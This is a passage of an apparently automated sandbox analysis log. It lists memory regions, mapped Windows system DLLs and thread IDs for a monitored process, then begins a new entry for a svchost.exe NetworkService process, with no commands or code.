0x169ffff entry_point = 0x0 region_type = private name = "private_0x0000000001660000" filename = "" Region: id = 2554 start_va = 0x1730000 end_va = 0x176ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 2555 start_va = 0x1770000 end_va = 0x188ffff entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 2556 start_va = 0x1890000 end_va = 0x1a90fff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 2557 start_va = 0x1ae0000 end_va = 0x1b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 2558 start_va = 0x1b60000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b60000" filename = "" Region: id = 2559 start_va = 0x1be0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 2560 start_va = 0x6ebf0000 end_va = 0x6ebfafff entry_point = 0x6ebf2fc7 region_type = mapped_file name = "wdiasqmmodule.dll" filename = "\\Windows\\System32\\wdiasqmmodule.dll" Region: id = 2561 start_va = 0x6ec00000 end_va = 0x6ec17fff entry_point = 0x6ec01cf4 region_type = mapped_file name = "radardt.dll" filename = "\\Windows\\System32\\radardt.dll" Region: id = 2562 start_va = 0x6ec20000 end_va = 0x6ec25fff entry_point = 0x6ec2112d region_type = mapped_file name = "pnpts.dll" filename = "\\Windows\\System32\\pnpts.dll" Region: id = 2563 start_va = 0x6ed50000 end_va = 0x6ed57fff entry_point = 0x6ed52ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" Region: id = 2564 start_va = 0x6edb0000 end_va = 0x6ee85fff entry_point = 0x6edb135a region_type = mapped_file name = "diagperf.dll" filename = "\\Windows\\System32\\diagperf.dll" Region: id = 2565 start_va = 0x6f6b0000 end_va = 0x6f709fff entry_point = 0x6f6b1f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" Region: id = 2566 start_va = 0x71800000 end_va = 0x7187dfff entry_point = 0x718198fa region_type = mapped_file name = "BFE.DLL" filename = "\\Windows\\System32\\BFE.DLL" Region: id = 2567 start_va = 0x72430000 end_va = 0x72441fff entry_point = 0x72433271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" Region: id = 2568 start_va = 0x72450000 end_va = 0x7245cfff entry_point = 0x72452012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" Region: id = 2569 start_va = 0x72470000 end_va = 0x724a7fff entry_point = 0x7247990e region_type = mapped_file name = "FWPUCLNT.DLL" filename = "\\Windows\\System32\\FWPUCLNT.DLL" Region: id = 2570 start_va = 0x72bd0000 end_va = 0x72be4fff entry_point = 0x72bd325e region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" Region: id = 2571 start_va = 0x72c80000 end_va = 0x72c86fff entry_point = 0x72c8128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" Region: id = 2572 start_va = 0x72c90000 end_va = 0x72cabfff entry_point = 0x72c9a431 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\System32\\IPHLPAPI.DLL" Region: id = 2573 start_va = 0x72e50000 end_va = 0x72e74fff entry_point = 0x72e56ba6 region_type = mapped_file name = "dps.dll" filename = "\\Windows\\System32\\dps.dll" Region: id = 2574 start_va = 0x737c0000 end_va = 0x737c7fff entry_point = 0x737c389b region_type = mapped_file name = "wfapigp.dll" filename = "\\Windows\\System32\\wfapigp.dll" Region: id = 2575 start_va = 0x73e20000 end_va = 0x73eacfff entry_point = 0x73e22032 region_type = mapped_file name = "MPSSVC.dll" filename = "\\Windows\\System32\\MPSSVC.dll" Region: id = 2576 start_va = 0x74070000 end_va = 0x74079fff entry_point = 0x74074d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" Region: id = 2577 start_va = 0x74130000 end_va = 0x7413ffff entry_point = 0x741338c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" Region: id = 2578 start_va = 0x741e0000 end_va = 0x7425cfff entry_point = 0x741e166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" Region: id = 2579 start_va = 0x74320000 end_va = 0x74340fff entry_point = 0x7432145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" Region: id = 2580 start_va = 0x745b0000 end_va = 0x745b5fff entry_point = 0x745b2311 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" Region: id = 2581 start_va = 0x74690000 end_va = 0x7469cfff entry_point = 0x746911e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" Region: id = 2582 start_va = 0x75200000 end_va = 0x75208fff entry_point = 0x75201220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" Region: id = 2583 start_va = 0x75210000 end_va = 0x75285fff entry_point = 0x7521760e region_type = mapped_file name = "FirewallAPI.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" Region: id = 2584 start_va = 0x75290000 end_va = 0x75294fff entry_point = 0x752915df region_type = mapped_file name = "WSHTCPIP.DLL" filename = "\\Windows\\System32\\WSHTCPIP.DLL" Region: id = 2585 start_va = 0x75310000 end_va = 0x7531afff entry_point = 0x7531129b region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" Region: id = 2586 start_va = 0x75340000 end_va = 0x75355fff entry_point = 0x75342061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" Region: id = 2587 start_va = 0x75360000 end_va = 0x75376fff entry_point = 0x75361c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" Region: id = 2588 start_va = 0x75450000 end_va = 0x75457fff entry_point = 0x754534d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" Region: id = 2589 start_va = 0x75520000 end_va = 0x7555afff entry_point = 0x7552128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 2590 start_va = 0x75730000 end_va = 0x75735fff entry_point = 0x75731673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" Region: id = 2591 start_va = 0x75740000 end_va = 0x7577bfff entry_point = 0x7574145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" Region: id = 2592 start_va = 0x75780000 end_va = 0x75795fff entry_point = 0x75782dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 2593 start_va = 0x758b0000 end_va = 0x758c6fff entry_point = 0x758b3574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" Region: id = 2594 start_va = 0x75910000 end_va = 0x7592afff entry_point = 0x75911286 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" Region: id = 2595 start_va = 0x75bc0000 end_va = 0x75bc7fff entry_point = 0x75bc10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" Region: id = 2596 start_va = 0x75be0000 end_va = 0x75bfafff entry_point = 0x75be93b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 2597 start_va = 0x75c00000 end_va = 0x75c0bfff entry_point = 0x75c010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 2598 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca1235 region_type = mapped_file name = "RpcRtRemote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" Region: id = 2599 start_va = 0x75cb0000 end_va = 0x75cbafff entry_point = 0x75cb1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 2600 start_va = 0x75f30000 end_va = 0x75f79fff entry_point = 0x75f37de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 2601 start_va = 0x75f80000 end_va = 0x75fa6fff entry_point = 0x75f858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" Region: id = 2602 start_va = 0x75fb0000 end_va = 0x75fcefff entry_point = 0x75fb1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 2603 start_va = 0x75fd0000 end_va = 0x76004fff entry_point = 0x75fd145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" Region: id = 2604 start_va = 0x76010000 end_va = 0x7605dfff entry_point = 0x76019c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 2605 start_va = 0x76060000 end_va = 0x760a4fff entry_point = 0x760611e1 region_type = mapped_file name = "Wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" Region: id = 2606 start_va = 0x76110000 end_va = 0x761b0fff entry_point = 0x76142433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 2607 start_va = 0x761c0000 end_va = 0x7626bfff entry_point = 0x761ca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 2608 start_va = 0x76270000 end_va = 0x76338fff entry_point = 0x7628d711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 2609 start_va = 0x77130000 end_va = 0x771cffff entry_point = 0x771449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 2610 start_va = 0x77580000 end_va = 0x7761cfff entry_point = 0x775b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 2611 start_va = 0x77620000 end_va = 0x7777bfff entry_point = 0x7766ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 2612 start_va = 0x77780000 end_va = 0x77853fff entry_point = 0x777cbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 2613 start_va = 0x77860000 end_va = 0x778b6fff entry_point = 0x77879ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 2614 start_va = 0x77a00000 end_va = 0x77a8efff entry_point = 0x77a03fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 2615 start_va = 0x77a90000 end_va = 0x77b5bfff entry_point = 0x77a9168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 2616 start_va = 0x77b60000 end_va = 0x77c9bfff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 2617 start_va = 0x77ca0000 end_va = 0x77ca5fff entry_point = 0x77ca1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 2618 start_va = 0x77cc0000 end_va = 0x77cc9fff entry_point = 0x77cc136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 2619 start_va = 0x77ce0000 end_va = 0x77cf8fff entry_point = 0x77ce4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 2620 start_va = 0x77d00000 end_va = 0x77d82fff entry_point = 0x77d023d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 2621 start_va = 0x77da0000 end_va = 0x77da0fff entry_point = 0x77da0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 2622 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2623 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 2624 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 2625 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 2626 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 2627 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 2628 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 2629 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 2630 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 2631 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 2632 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 2633 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 2634 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 2635 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2636 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 2637 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 2638 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 2639 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 2640 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 2641 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 2642 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 2643 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 2644 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2645 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 2646 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 2647 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2648 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 212 os_tid = 0x928 Thread: id = 213 os_tid = 0x920 Thread: id = 214 os_tid = 0x91c Thread: id = 215 os_tid = 0x90c Thread: id = 216 os_tid = 0x8fc Thread: id = 217 os_tid = 0x11c Thread: id = 218 os_tid = 0x120 Thread: id = 219 os_tid = 0x794 Thread: id = 220 os_tid = 0x718 Thread: id = 221 os_tid = 0x710 Thread: id = 222 os_tid = 0x704 Thread: id = 223 os_tid = 0x6c0 Thread: id = 224 os_tid = 0x6bc Thread: id = 225 os_tid = 0x6b8 Thread: id = 226 os_tid = 0x68c Thread: id = 227 os_tid = 0x684 Thread: id = 228 os_tid = 0x680 Thread: id = 229 os_tid = 0x678 Thread: id = 230 os_tid = 0x60c Thread: id = 231 os_tid = 0x5f0 Thread: id = 232 os_tid = 0x5dc Thread: id = 233 os_tid = 0x5d8 Thread: id = 234 os_tid = 0x5b8 Thread: id = 235 os_tid = 0x5b0 Thread: id = 240 os_tid = 0x9f8 Thread: id = 245 os_tid = 0xad4 Thread: id = 270 os_tid = 0xbac Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f0a82a0" os_pid = "0x4dc" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x3f0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" Region: id = 2696 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2697 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2698 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2699 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2700 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 2701 start_va = 0xc0000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2702 start_va = 0x140000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2703 start_va = 0x180000 end_va = 0x247fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 2704 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 2705 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2706 start_va = 0x270000 end_va = 0x370fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 2707 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2708 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2709 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 2710 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2711 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2712 start_va = 0x3d0000 end_va = 0x3d7fff entry_point = 0x3d2104 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" Region: id = 2713 start_va = 0x3e0000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2714 start_va = 0x420000 end_va = 0x42dfff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2715 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2716 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2717 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2718 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2719 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2720 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2721 start_va = 0x4c0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2722 start_va = 0x500000 end_va = 0x500fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2723 start_va = 0x510000 end_va = 0x511fff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2724 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2725 start_va = 0x560000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2726 start_va = 0x660000 end_va = 0xa52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 2727 start_va = 0xa60000 end_va = 0xa64fff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 2728 start_va = 0xa70000 end_va = 0xa70fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 2729 start_va = 0xa80000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 2730 start_va = 0xa90000 end_va = 0xa90fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 2731 start_va = 0xaa0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 2732 start_va = 0xae0000 end_va = 0xaeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 2733 start_va = 0xaf0000 end_va = 0xafffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 2734 start_va = 0xb00000 end_va = 0xb0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 2735 start_va = 0xb10000 end_va = 0xb1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 2736 start_va = 0xb20000 end_va = 0xb2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 2737 start_va = 0xb30000 end_va = 0xb3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 2738 start_va = 0xb40000 end_va = 0xb4ffff entry_point = 0xb40000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2739 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0xb50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2740 start_va = 0xb60000 end_va = 0xb6ffff entry_point = 0xb60000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2741 start_va = 0xb70000 end_va = 0xb7ffff entry_point = 0xb70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2742 start_va = 0xb80000 end_va = 0xb8ffff entry_point = 0xb80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2743 start_va = 0xbd0000 end_va = 0xbdffff entry_point = 0xbd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2744 start_va = 0xbe0000 end_va = 0xeaefff entry_point = 0xbe0000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 2745 start_va = 0xeb0000 end_va = 0xebffff entry_point = 0xeb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2746 start_va = 0xec0000 end_va = 0xecffff entry_point = 0xec0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2747 start_va = 0xed0000 end_va = 0xedffff entry_point = 0xed0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2748 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 2749 start_va = 0xf20000 end_va = 0xf2ffff entry_point = 0xf20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2750 start_va = 0xf30000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 2751 start_va = 0xf70000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 2752 start_va = 0xfb0000 end_va = 0xfbffff entry_point = 0xfb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2753 start_va = 0xfc0000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 2754 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 2755 start_va = 0x1040000 end_va = 0x104ffff entry_point = 0x1040000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2756 start_va = 0x1050000 end_va = 0x105ffff entry_point = 0x1050000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2757 start_va = 0x1060000 end_va = 0x106ffff entry_point = 0x1060000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" Region: id = 2758 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 2759 start_va = 0x10b0000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2760 start_va = 0x10c0000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 2761 start_va = 0x10d0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 2762 start_va = 0x10e0000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 2763 start_va = 0x1160000 end_va = 0x116ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 2764 start_va = 0x1170000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 2765 start_va = 0x1180000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 2766 start_va = 0x1190000 end_va = 0x1190fff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 2767 start_va = 0x11a0000 end_va = 0x11dffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 2768 start_va = 0x11e0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 2769 start_va = 0x11f0000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 2770 start_va = 0x1200000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 2771 start_va = 0x1210000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 2772 start_va = 0x1220000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 2773 start_va = 0x1230000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 2774 start_va = 0x1240000 end_va = 0x1240fff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 2775 start_va = 0x1250000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 2776 start_va = 0x1260000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 2777 start_va = 0x1360000 end_va = 0x145ffff 